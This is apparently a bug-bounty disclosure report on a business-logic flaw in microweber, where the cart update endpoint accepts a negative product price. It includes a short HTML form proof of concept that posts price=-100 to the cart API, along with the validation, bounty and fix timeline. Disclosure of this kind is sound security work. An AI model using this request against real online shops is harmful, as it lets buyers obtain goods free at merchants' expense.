Business Logic Errors in microweber/microweber

Valid

Reported on

Jul 20th 2021

✍️ Description

microweber is vulnerable to Business Logic error through negative product price.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="http://localhost/api/update_cart" method="POST" >
  <input type="text" name="for" value="content">
  <input type="text" name="for_id" value="1">
  <input type="text" name="price" value="-100">
  <input type="submit"> 
</form>

Save the above content into an HTML file.
Access the app (localhost) and add a product to the cart.
Open the HTML file and click on submit button to take $100 off.

PoC video.

💥 Impact

It is possible to get all products for free.

Occurrences

CartManager.php L38

We have contacted a member of the microweber team and are waiting to hear back 2 years ago

Peter Ivanov validated this vulnerability 2 years ago

Renan Rocha has been awarded the disclosure bounty

The fix bounty is now up for grabs

Peter Ivanov marked this as fixed with commit 76c277 2 years ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

Peter Ivanov

commented 2 years ago

hi, thanks for report,

this issue is happening only on products that does not have price set in the CMS

now its fixed

to join this conversation